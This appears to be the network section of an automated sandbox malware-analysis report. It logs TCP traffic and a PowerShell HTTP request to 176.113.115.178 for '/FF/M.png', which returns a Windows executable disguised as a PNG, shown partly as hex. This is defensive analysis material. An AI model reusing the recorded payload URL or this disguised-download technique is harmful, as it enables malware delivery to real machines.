                                                        Dec 18, 2024 14:08:32.228795052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.228809118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.228866100 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.229541063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.229716063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.229793072 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.230616093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.230669975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.230735064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.231471062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.231484890 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.231605053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.232145071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.232158899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.232215881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.232873917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.232876062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.233006001 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.233736038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.233851910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.233911037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.234529018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.234606028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.234735966 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.235421896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.235435009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.235582113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.236212969 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.236399889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.236535072 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.237015009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.237082958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.237138033 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.237818956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.237903118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.237951040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.238770962 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.239038944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.239089966 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.239778042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.239799023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.239851952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.240330935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.240533113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.240672112 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.241159916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.241384983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.241437912 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.242120028 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.242135048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.242177963 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.242870092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.243046045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.243108034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.243720055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.243913889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.244215965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.244543076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.244648933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.244695902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.245613098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.245626926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.245683908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.246260881 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.246429920 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.246552944 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.247013092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.247140884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.247195005 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.264866114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.264986038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.265053034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.265264034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.265732050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.265782118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.266185045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.266483068 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.266602993 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.266942024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.318432093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.398591042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.398617983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.398663044 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.398866892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.399029970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.399064064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.399112940 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.399983883 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.399998903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.400083065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.400702953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.400851965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.400985003 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.401685953 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.401772976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.401803017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.402719975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.402743101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.402784109 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.403409958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.403563976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.403599024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.404082060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.404123068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.404227018 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.404903889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.404963017 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.405077934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.405765057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.405811071 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.406058073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.406563997 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.406656027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.406670094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.407392025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.407475948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.407880068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.408246994 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.408292055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.408346891 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.409065008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.409171104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.409276009 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.409939051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.409986019 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.410000086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.410783052 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.410830975 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.410855055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.411576986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.411623001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.411633968 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.412408113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.412446976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.412496090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.413326979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.413420916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.413479090 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.414123058 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.414206982 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.414233923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.414894104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.414936066 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.414968014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.415747881 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.415847063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.415857077 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.416671038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.416709900 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.416727066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.417460918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.417501926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.417503119 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.418237925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.418284893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.418353081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.419164896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.419178963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.419203997 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.419976950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.420032024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.420059919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.420831919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.420846939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.420896053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.421664000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.421719074 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.421756029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.422504902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.422519922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.422620058 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.423252106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.423341990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.423476934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.424093962 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.424164057 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.424252033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.425028086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.425040960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.425142050 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.425892115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.425949097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.425978899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.426664114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.426728010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.426760912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.427510977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.427557945 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.427570105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.428332090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.428488970 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.428548098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.429137945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.429177999 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.429352999 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.430020094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.430038929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.430074930 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.430874109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.430880070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.430922985 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.431775093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.431790113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.431829929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.432450056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.432540894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.432759047 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.433435917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.433453083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.433502913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.434127092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.434166908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.434211016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.435050964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.435092926 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.435249090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.435880899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.435898066 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.435919046 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.436608076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.436644077 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.436768055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.437524080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.437552929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.437578917 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.438328981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.438373089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.438373089 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.439106941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.439145088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.439207077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.456959009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.456979036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.457057953 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.457065105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.457170010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.457412958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.457902908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.458019972 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.458200932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.458729029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.458744049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.458784103 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.505793095 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.591401100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.591490984 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.591588020 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.591835976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.591968060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.592039108 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.592876911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.593135118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.593209982 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.593976021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.594100952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.594187975 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.595165014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.595185995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.595264912 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.595710993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.595777988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.595828056 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.596520901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.596590042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.596645117 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.597142935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.597224951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.597331047 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.597862959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.597942114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.597996950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.598459959 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:32.646414995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:32.901860952 CET4974680192.168.2.10176.113.115.178

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Dec 18, 2024 14:07:59.518354893 CET1.1.1.1192.168.2.100x1142No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Dec 18, 2024 14:07:59.518354893 CET1.1.1.1192.168.2.100x1142No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • 176.113.115.178

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.1049746176.113.115.178808076C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 18, 2024 14:08:19.534662962 CET73OUTGET /FF/M.png HTTP/1.1
                                                        Host: 176.113.115.178
                                                        Connection: Keep-Alive
                                                        Dec 18, 2024 14:08:20.857053995 CET1236INHTTP/1.1 200 OK
                                                        Content-Type: image/png
                                                        Last-Modified: Sun, 06 Oct 2024 18:12:58 GMT
                                                        Accept-Ranges: bytes
                                                        ETag: "08ec05f1b18db1:0"
                                                        Server: Microsoft-IIS/10.0
                                                        Date: Wed, 18 Dec 2024 13:08:20 GMT
                                                        Content-Length: 7679488
                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 07 00 5e 6e f4 65 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 a0 00 00 00 78 54 00 00 00 00 00 00 d0 af 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 af 00 00 04 00 00 fe e2 75 00 02 00 60 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8d 90 55 00 b5 00 00 00 00 e0 53 00 66 a3 01 00 20 e0 af 00 98 01 00 00 00 00 00 00 00 00 00 00 c0 22 ae 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 22 ae 00 28 00 00 00 00 00 [TRUNCATED]
                                                        Data Ascii: MZx@xhr!L!This program cannot be run in DOS mode.$PEd^ne"xT@u`USf "`"( SR@.rsrcfSR@.idata US@ 8US@ndryujmpp!`f!S@tnyudguu*u@.pdataI,u@@
                                                        Dec 18, 2024 14:08:20.857079983 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 18, 2024 14:08:20.857383013 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 18, 2024 14:08:20.857553959 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 18, 2024 14:08:20.857566118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Dec 18, 2024 14:08:20.857731104 CET672INData Raw: 1f e5 1a 1b d0 cd c8 2f 83 44 69 46 aa fa be 19 20 10 1d 39 95 7f 0c 43 af 22 11 0f 98 23 4a 4d e8 a0 64 02 5c c9 61 c9 05 b8 91 44 0f f3 ca 06 dd 64 4a fe 82 a9 0f e4 10 96 93 74 7f 04 43 73 22 d5 0f f3 6a 81 a5 e8 64 64 c6 41 48 4e 9c 31 fd 55
                                                        Data Ascii: /DiF 9C"#JMd\aDdJtCs"jddAHN1U|?Fv{"=W*(Do{R?4$lA50]dNwV??L20 ZD!TO<-)8c.fuI)$Eh@\u
                                                        Dec 18, 2024 14:08:20.857742071 CET1236INData Raw: 22 22 05 86 c0 ec 58 0c 83 78 08 80 0f 45 50 d8 25 0a a3 1e e1 84 d3 47 69 f2 1d 5c 27 73 89 60 c9 ab 96 a0 2b 75 04 4d 66 70 e1 8b 03 c8 4b 04 75 42 e6 31 07 4c 01 f1 89 45 aa d6 43 41 b8 f4 b2 ad 05 f2 e8 0f 02 77 df 44 c3 90 f5 fb 72 d2 ca e4
